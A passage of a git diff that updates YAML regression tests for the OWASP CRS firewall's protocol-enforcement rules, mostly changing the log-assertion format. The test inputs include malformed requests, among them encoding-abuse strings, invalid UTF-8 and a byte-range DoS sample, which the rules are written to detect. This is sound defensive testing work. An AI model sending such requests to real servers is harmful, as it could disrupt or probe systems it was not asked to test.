"R0VUIC8gSFRUUC8xLjENCkFjY2VwdDogKi8qDQpIb3N0OiBsb2NhbGhvc3QNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpVc2VyLUFnZW50OiBNb2RTZWN1cml0eSBDUlMgMyBUZXN0cw0KDQozDQpIaSANCjMNCkNSUw0KMA0KDQo=" output: - log_contains: "id \"920171\"" + log: + expect_ids: [920171] - # HEAD Request with chunked data (invalid) test_id: 3 stages: @@ -69,4 +71,5 @@ tests: # encoded_request: "SEVBRCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" output: - log_contains: "id \"920171\"" + log: + expect_ids: [920171] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml index f6c4546ec..0ed8225af 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920180.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920180 tests: - test_id: 1 @@ -16,11 +15,12 @@ tests: Content-Type: "application/x-www-form-urlencoded" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "hi=test" - stop_magic: true + autocomplete_headers: false uri: "/" version: "HTTP/1.1" output: - log_contains: id "920180" + log: + expect_ids: [920180] - test_id: 2 stages: - input: @@ -36,12 +36,13 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: id "920180" + log: + no_expect_ids: [920180] - test_id: 3 desc: POST request missing Content-Length Header (920180) from old modsec regressions stages: - input: - stop_magic: true + autocomplete_headers: false dest_addr: 127.0.0.1 headers: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 @@ -56,7 +57,8 @@ tests: uri: / version: HTTP/1.0 output: - log_contains: id "920180" + log: + expect_ids: [920180] - test_id: 4 desc: Ignore check of CT header if protocol is HTTP/2 stages: @@ -75,4 +77,5 @@ tests: uri: / version: HTTP/2.0 output: - no_log_contains: id "920180" + log: + no_expect_ids: [920180] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml index c8f36e239..189f62708 100755 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920181.yaml @@ -1,7 +1,6 @@ --- meta: author: "fgsch" - description: "Description" rule_id: 920181 tests: - test_id: 1 @@ -18,9 +17,10 @@ tests: Content-Type: "application/x-www-form-urlencoded" Transfer-Encoding: "chunked" User-Agent: "OWASP CRS test agent" - data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" + data: "7\x0D\x0Afoo=bar\x0D\x0A0\x0D\x0A\x0D\x0A" stop_magic: true output: # Apache unsets the Content-Length header if Transfer-Encoding is found! status: 200 - no_log_contains: id "920181" + log: + no_expect_ids: [920181] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml index b4f29d6f0..86df27281 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920190.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920190 tests: - test_id: 1 @@ -18,7 +17,8 @@ tests: uri: "/" version: HTTP/1.1 output: - no_log_contains: id "920190" + log: + no_expect_ids: [920190] - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: @@ -38,7 +38,8 @@ tests: uri: / version: HTTP/1.1 output: - log_contains: id "920190" + log: + expect_ids: [920190] - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: @@ -54,4 +55,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920190\"" + log: + expect_ids: [920190] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 5f3be3dc6..dc322f386 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920200 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php test_id: 2 stages: @@ -32,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 3 stages: - input: @@ -46,7 +47,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920200\"" + log: + no_expect_ids: [920200] - test_id: 4 stages: - input: @@ -60,7 +62,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 5 stages: - input: @@ -74,7 +77,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920200\"" + log: + expect_ids: [920200] - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: @@ -94,7 +98,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920200" + log: + expect_ids: [920200] - test_id: 7 desc: This should PASS (PL2) stages: @@ -110,7 +115,8 @@ tests: uri: "/get/index.html" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: @@ -126,7 +132,8 @@ tests: uri: "/get/index.html" version: "HTTP/1.1" output: - log_contains: id "920200" + log: + expect_ids: [920200] - test_id: 9 desc: This should PASS (PL2) stages: @@ -142,7 +149,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] - test_id: 10 desc: This should PASS (PL2) stages: @@ -158,4 +166,5 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - no_log_contains: id "920200" + log: + no_expect_ids: [920200] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 46dd36bee..cdeed77c4 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml @@ -19,7 +19,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - log_contains: id "920201" + log: + expect_ids: [920201] - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: @@ -35,4 +36,5 @@ tests: uri: "/get/index%2Epdf" version: "HTTP/1.1" output: - log_contains: id "920201" + log: + expect_ids: [920201] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index 13647827f..8e6babaca 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml @@ -19,7 +19,8 @@ tests: uri: "/get/index.pdf" version: "HTTP/1.1" output: - log_contains: id "920202" + log: + expect_ids: [920202] - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: @@ -35,4 +36,5 @@ tests: uri: "/get/index%2Epdf" version: "HTTP/1.1" output: - log_contains: id "920202" + log: + expect_ids: [920202] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index b6d914fb9..69f531288 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -17,7 +17,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920210\"" + log: + no_expect_ids: [920210] - test_id: 2 stages: - input: @@ -31,7 +32,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 3 stages: - input: @@ -45,7 +47,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 4 stages: - input: @@ -59,7 +62,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920210\"" + log: + expect_ids: [920210] - test_id: 5 stages: - input: @@ -73,7 +77,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920210\"" + log: + no_expect_ids: [920210] - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: @@ -92,7 +97,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920210" + log: + expect_ids: [920210] - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: @@ -111,4 +117,5 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: id "920210" + log: + expect_ids: [920210] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 39401c384..4f321727b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -5,7 +5,7 @@ meta: rule_id: 920220 tests: - test_id: 1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -17,9 +17,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 2 - description: Detect invalid URI encoding in decoded URI (`%1G`) + desc: Detect invalid URI encoding in decoded URI (`%1G`) stages: - input: dest_addr: "127.0.0.1" @@ -31,9 +32,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 3 - description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) + desc: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) stages: - input: dest_addr: "127.0.0.1" @@ -45,9 +47,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 4 - description: Do not trigger for spaces encoded as `+`, which is valid + desc: Do not trigger for spaces encoded as `+`, which is valid stages: - input: dest_addr: "127.0.0.1" @@ -59,9 +62,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 5 - description: | + desc: | Detect incomplete URI encoding sequence (`bxy`, with crippled encoding of `b`). Note that the second character must not complete the `%6` to a valid sequence. stages: @@ -75,9 +79,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 6 - description: Detect incomplete URI encoding sequence, single `%` (`bad%`) + desc: Detect incomplete URI encoding sequence, single `%` (`bad%`) stages: - input: dest_addr: "127.0.0.1" @@ -89,9 +94,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920220\"" + log: + expect_ids: [920220] - test_id: 7 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`) stages: - input: dest_addr: "127.0.0.1" @@ -103,9 +109,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] - test_id: 8 - description: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query + desc: Do not inspect file names for invalid URI encoding (`Taxes20%Done.txt`), with query stages: - input: dest_addr: "127.0.0.1" @@ -117,4 +124,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920220\"" + log: + no_expect_ids: [920220] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml index 423422384..e6e2bf592 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920221.yaml @@ -5,7 +5,7 @@ meta: rule_id: 920221 tests: - test_id: 1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -17,9 +17,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920221\"" + log: + expect_ids: [920221] - test_id: 2 - description: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) + desc: Ignore invalid URI encoding if the last path segment looks like file name (`%w20`) stages: - input: dest_addr: "127.0.0.1" @@ -31,4 +32,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920221\"" + log: + no_expect_ids: [920221] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml index 8b00df53d..1eb6b6c52 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920230.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920230 tests: - # From old modsec regression tests @@ -20,7 +19,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920230\"" + log: + expect_ids: [920230] - # From old modsec regression tests test_id: 2 stages: @@ -37,4 +37,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - no_log_contains: "id \"920230\"" + log: + no_expect_ids: [920230] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml index 5197bca9a..3cea2441c 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920240.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920240 tests: - test_id: 1 @@ -18,10 +17,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "x=new %w20$" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] - test_id: 2 stages: - input: @@ -36,10 +36,11 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 uri: "/" data: "x=new %20$" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - test_id: 3 stages: - input: @@ -55,7 +56,8 @@ tests: data: "param=value" version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - # We have a valid percent encoding here test_id: 4 stages: @@ -83,7 +85,8 @@ tests: </SOAP-ENV:Envelope> version: "HTTP/1.1" output: - no_log_contains: "id \"920240\"" + log: + no_expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests test_id: 5 stages: @@ -102,10 +105,11 @@ tests: Content-Length: "9" uri: "/" data: "param=%1G" - stop_magic: true + autocomplete_headers: false version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] - # test URL Encoding Abuse Attack Attempt from old regression tests test_id: 6 stages: @@ -125,4 +129,5 @@ tests: data: "param=%7%6F%6D%65%74%65%78%74%5F%31%32%33%" version: "HTTP/1.1" output: - log_contains: "id \"920240\"" + log: + expect_ids: [920240] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml index f56ff48c6..ebfc6cc54 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920250.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920250 tests: - # crs-setup.conf needs to have CRS_VALIDATE_UTF8_ENCODING set @@ -21,7 +20,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - # Taken from existing modsec regression test_id: 2 stages: @@ -38,7 +38,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - # Taken from existing modsec regression test_id: 3 stages: @@ -55,7 +56,8 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] - test_id: 4 desc: "Status Page Test - Invalid UTF-8 encoding: %C2%A3 is a valid Pound sign; %E2%A3 is invalid UTF-8 (incorrect starting binary sequence)" stages: @@ -72,4 +74,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920250\"" + log: + expect_ids: [920250] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index 4d73eb74e..074276e9f 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920260 tests: - test_id: 1 @@ -9,34 +8,36 @@ tests: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=%uff0F" + uri: "/get?test=%uff0F" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920260\"" + log: + expect_ids: [920260] - test_id: 2 stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?test=%u0F" + uri: "/get?test=%u0F" headers: User-Agent: "OWASP CRS test agent" Host: "localhost" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920260\"" - - # Test taken from existing modsec regression - test_id: 3 + log: + no_expect_ids: [920260] + - test_id: 3 + desc: Test taken from existing modsec regression stages: - input: dest_addr: "127.0.0.1" port: 80 - uri: "/?param=foo%uFF01" + uri: "/get?param=foo%uFF01" version: "HTTP/1.0" headers: User-Agent: "OWASP CRS test agent" @@ -46,4 +47,5 @@ tests: Keep-Alive: "300" Proxy-Connection: "keep-alive" output: - log_contains: "id \"920260\"" + log: + expect_ids: [920260] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index c9f7b3bd5..c962b7cb2 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920270 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 3 stages: - input: @@ -42,10 +43,12 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" - - # This causes apache to error before it gets to CRS. Therefore - # we'll mark this as a status 400 now until the FTW OR output is added - test_id: 4 + log: + expect_ids: [920270] + - test_id: 4 + desc: | + This causes apache to error before it gets to CRS. Therefore, + we'll mark this as a status 400 now until the FTW OR output is added stages: - input: dest_addr: "127.0.0.1" @@ -58,7 +61,6 @@ tests: version: "HTTP/1.1" output: status: 400 - # log_contains: "id \"920270\"" - test_id: 5 stages: - input: @@ -72,7 +74,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] - test_id: 6 stages: - input: @@ -85,7 +88,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" + log: + no_expect_ids: [920270] - test_id: 7 stages: - input: @@ -98,7 +102,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" + log: + no_expect_ids: [920270] - test_id: 8 stages: - input: @@ -111,9 +116,10 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920270\"" - - # Test converted from old tests - test_id: 9 + log: + no_expect_ids: [920270] + - test_id: 9 + desc: Test converted from old tests stages: - input: dest_addr: "127.0.0.1" @@ -128,4 +134,5 @@ tests: Proxy-Connection: "keep-alive" version: "HTTP/1.1" output: - log_contains: "id \"920270\"" + log: + expect_ids: [920270] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index ce37fa41d..da227ce23 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920271 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 3 stages: - input: @@ -42,7 +43,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 4 stages: - input: @@ -56,7 +58,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920271\"" + log: + expect_ids: [920271] - test_id: 5 stages: - input: @@ -69,7 +72,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920271\"" + log: + no_expect_ids: [920271] - test_id: 6 stages: - input: @@ -82,4 +86,5 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920271\"" + log: + no_expect_ids: [920271] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index 6f350b92a..96783d5c0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920272 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 2 stages: - input: @@ -29,7 +29,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 3 stages: - input: @@ -42,7 +43,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920272\"" + log: + expect_ids: [920272] - test_id: 4 stages: - input: @@ -55,7 +57,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920272\"" + log: + no_expect_ids: [920272] - test_id: 5 stages: - input: @@ -69,4 +72,5 @@ tests: version: "HTTP/1.1" output: status: 200 - log_contains: "id \"920272\"" + log: + expect_ids: [920272] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index e66263274..981cc1c8a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 920273 tests: - test_id: 1 @@ -16,7 +15,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] - # the '&' is one of the only symbol allowed test_id: 2 stages: @@ -30,7 +30,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - no_log_contains: "id \"920273\"" + log: + no_expect_ids: [920273] - test_id: 3 stages: - input: @@ -44,7 +45,8 @@ tests: data: "<hello" version: "HTTP/1.1" output: - log_contains: "id \"920273\"" + log: + expect_ids: [920273] - test_id: 4 stages: - input: @@ -57,7 +59,8 @@ tests: Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 version: "HTTP/1.1" output: - 